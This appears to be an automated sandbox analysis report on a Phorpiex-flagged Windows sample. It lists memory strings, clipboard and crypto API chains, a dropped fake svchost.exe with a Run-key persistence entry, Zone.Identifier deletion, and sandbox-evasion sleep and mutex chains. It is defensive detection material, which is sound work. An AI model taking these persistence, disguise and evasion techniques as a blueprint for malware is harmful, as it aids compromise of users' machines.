Source: svchost.exe, 00000023.00000003.813860527.0000019B88935000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfsrfsrf060805&fid=cp.live.com
Source: svchost.exe, 00000023.00000003.816291568.0000019B88960000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
Source: svchost.exe, 00000023.00000003.816291568.0000019B88960000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 00000023.00000003.814170778.0000019B8893B000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.sr
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813619898.0000019B8892E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813740249.0000019B88950000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.814235843.0000019B88933000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813619898.0000019B8892E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813740249.0000019B88950000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813681795.0000019B88977000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813681795.0000019B88977000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 00000023.00000003.816291568.0000019B88960000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 00000023.00000003.814170778.0000019B8893B000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?8
Source: svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813619898.0000019B8892E000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600Key0
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813619898.0000019B8892E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813740249.0000019B88950000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813681795.0000019B88977000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 00000023.00000003.813681795.0000019B88977000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.814222545.0000019B88930000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813681795.0000019B88977000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.814222545.0000019B88930000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813681795.0000019B88977000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.814222545.0000019B88930000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813681795.0000019B88977000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.814222545.0000019B88930000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813681795.0000019B88977000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813619898.0000019B8892E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813740249.0000019B88950000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cpxB
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.814222545.0000019B88930000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813681795.0000019B88977000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 00000023.00000003.813637250.0000019B8893B000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.1179648365.0000019B88102000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 00000023.00000003.813637250.0000019B8893B000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.1179648365.0000019B88102000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.814019019.0000019B88968000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 00000023.00000003.1179630037.0000019B880FB000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srfet
Source: svchost.exe, 00000023.00000003.1179648365.0000019B88102000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813872864.0000019B8890E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
Source: svchost.exe, 00000023.00000003.1179648365.0000019B88102000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.814170778.0000019B8893B000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srfrtificate
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.1179648365.0000019B88102000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf%c
Source: svchost.exe, 00000023.00000003.1179648365.0000019B88102000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 00000023.00000002.1628490987.0000019B880D6000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com:443/RST2.srf
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp	String found in binary or memory: https://signup.live.com/signup.aspx
Source: svchost.exe, 0000000F.00000002.309640507.00000222DD03E000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000F.00000002.309600013.00000222DD013000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000002.309640507.00000222DD03E000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000F.00000003.309334716.00000222DD046000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000F.00000003.309334716.00000222DD046000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000F.00000002.309612750.00000222DD029000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000F.00000003.287570838.00000222DD031000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000F.00000003.309284511.00000222DD050000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: svchost.exe, 00000023.00000003.1115351406.0000019B89024000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 00000021.00000003.561230116.00000229F1D9A000.00000004.00000001.sdmp	String found in binary or memory: https://www.hulu.com/ca-privacy-rights
Source: svchost.exe, 00000021.00000003.561230116.00000229F1D9A000.00000004.00000001.sdmp	String found in binary or memory: https://www.hulu.com/do-not-sell-my-info
Source: svchost.exe, 00000021.00000003.570222195.00000229F1D57000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.570107516.00000229F1D99000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000021.00000003.570222195.00000229F1D57000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.570107516.00000229F1D99000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe

Code function: 0_2_008B1000 strlen,isalpha,isdigit,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_008B1000

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe

Code function: 0_2_008B1660 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,Sleep,

0_2_008B1660

Source: Br6Pmt0MiZ.exe, 00000000.00000002.237445887.0000000000C5A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Phorpiex

Show sources

Source: Yara match	File source: Process Memory Space: svchost.exe PID: 68, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6392, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1720, type: MEMORY
Source: Yara match	File source: Process Memory Space: Br6Pmt0MiZ.exe PID: 5220, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 4424, type: MEMORY

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Code function: 0_2_008B17D0 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,	0_2_008B17D0
Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Code function: 0_2_008B16F0 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,	0_2_008B16F0
Source: C:\16642873124159\svchost.exe	Code function: 1_2_00AB16F0 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,	1_2_00AB16F0
Source: C:\16642873124159\svchost.exe	Code function: 1_2_00AB17D0 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,	1_2_00AB17D0

System Summary:

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\16642873124159\svchost.exe 7C419F22E51F37BE0C483BBF3C320C40B6939785896B756C504AF5DE5B46237F

Source: Br6Pmt0MiZ.exe, 00000000.00000002.237885208.0000000002FB0000.00000002.00000001.sdmp

Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Br6Pmt0MiZ.exe

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior

Source: Br6Pmt0MiZ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@21/15@11/5

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe

Code function: 0_2_008B1EC0 CoCreateInstance,

0_2_008B1EC0

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5136:120:WilError_01
Source: C:\16642873124159\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\tyu6uyur

Source: Br6Pmt0MiZ.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\16642873124159\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\16642873124159\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\16642873124159\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\16642873124159\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\16642873124159\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\16642873124159\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\16642873124159\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\16642873124159\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Br6Pmt0MiZ.exe	Virustotal: Detection: 87%
Source: Br6Pmt0MiZ.exe	Metadefender: Detection: 44%
Source: Br6Pmt0MiZ.exe	ReversingLabs: Detection: 89%

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe

File read: C:\Users\user\Desktop\Br6Pmt0MiZ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Br6Pmt0MiZ.exe 'C:\Users\user\Desktop\Br6Pmt0MiZ.exe'
Source: unknown	Process created: C:\16642873124159\svchost.exe C:\16642873124159\svchost.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\16642873124159\svchost.exe 'C:\16642873124159\svchost.exe'
Source: unknown	Process created: C:\16642873124159\svchost.exe 'C:\16642873124159\svchost.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\16642873124159\svchost.exe 'C:\16642873124159\svchost.exe'
Source: unknown	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wisvc
Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Process created: C:\16642873124159\svchost.exe C:\16642873124159\svchost.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable	Jump to behavior

Source: Br6Pmt0MiZ.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: Br6Pmt0MiZ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: Br6Pmt0MiZ.exe	Static PE information: real checksum: 0xe934 should be: 0xc8b0
Source: svchost.exe.0.dr	Static PE information: real checksum: 0xe934 should be: 0xc8b0

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Code function: 0_2_008B55C0 push eax; ret		0_2_008B55EE
Source: C:\16642873124159\svchost.exe	Code function: 1_2_00AB55C0 push eax; ret		1_2_00AB55EE

Persistence and Installation Behavior:

Drops PE files with benign system names

Show sources

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe

File created: C:\16642873124159\svchost.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe

File created: C:\16642873124159\svchost.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Host Process for Windows Services			Jump to behavior
Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Host Process for Windows Services			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	File opened: C:\Users\user\Desktop\Br6Pmt0MiZ.exe:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\16642873124159\svchost.exe	File opened: C:\16642873124159\svchost.exe:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\16642873124159\svchost.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_1-952
Source: C:\16642873124159\svchost.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_1-952
Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_0-952
Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_0-952

Source: C:\16642873124159\svchost.exe

Window / User API: threadDelayed 2693

Jump to behavior

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Evaded block: after key decision	graph_0-1033
Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Evaded block: after key decision	graph_0-1009
Source: C:\16642873124159\svchost.exe	Evaded block: after key decision	graph_1-987

Source: C:\16642873124159\svchost.exe

Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

graph_1-1171

Source: C:\16642873124159\svchost.exe TID: 748	Thread sleep count: 2693 > 30	Jump to behavior
Source: C:\16642873124159\svchost.exe TID: 748	Thread sleep time: -538600s >= -30000s	Jump to behavior
Source: C:\16642873124159\svchost.exe TID: 992	Thread sleep time: -105440s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5484	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5484	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6360	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7088	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4232	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\16642873124159\svchost.exe	Last function: Thread delayed
Source: C:\16642873124159\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Code function: 0_2_008B1F80 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_008B1F80
Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe	Code function: 0_2_008B20C0 wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,PathFileExistsW,_wfopen,fwprintf,fclose,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	0_2_008B20C0
Source: C:\16642873124159\svchost.exe	Code function: 1_2_00AB1F80 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00AB1F80
Source: C:\16642873124159\svchost.exe	Code function: 1_2_00AB20C0 wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,PathFileExistsW,_wfopen,fwprintf,fclose,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	1_2_00AB20C0

Source: svchost.exe, 00000003.00000002.269189319.0000014888F40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.292764240.000001D371060000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.1648911205.000001A8D4D40000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.586234326.00000229F2400000.00000002.00000001.sdmp, svchost.exe, 00000023.00000002.1630601797.0000019B88D40000.00000002.00000001.sdmp, svchost.exe, 00000025.00000002.959335751.000001A943EA0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000004.00000002.599428507.00000201AC860000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 00000021.00000002.585564318.00000229F146F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWP
Source: svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW(^
Source: Br6Pmt0MiZ.exe, 00000000.00000002.237489113.0000000000CA3000.00000004.00000001.sdmp, svchost.exe, 00000001.00000002.1647284281.0000000000853000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.599417528.00000201AC853000.00000004.00000001.sdmp, svchost.exe, 00000021.00000002.585673888.00000229F14EB000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628470581.0000019B880D1000.00000004.00000001.sdmp, svchost.exe, 00000025.00000002.959019455.000001A943852000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000B.00000002.1646604008.000001C866402000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
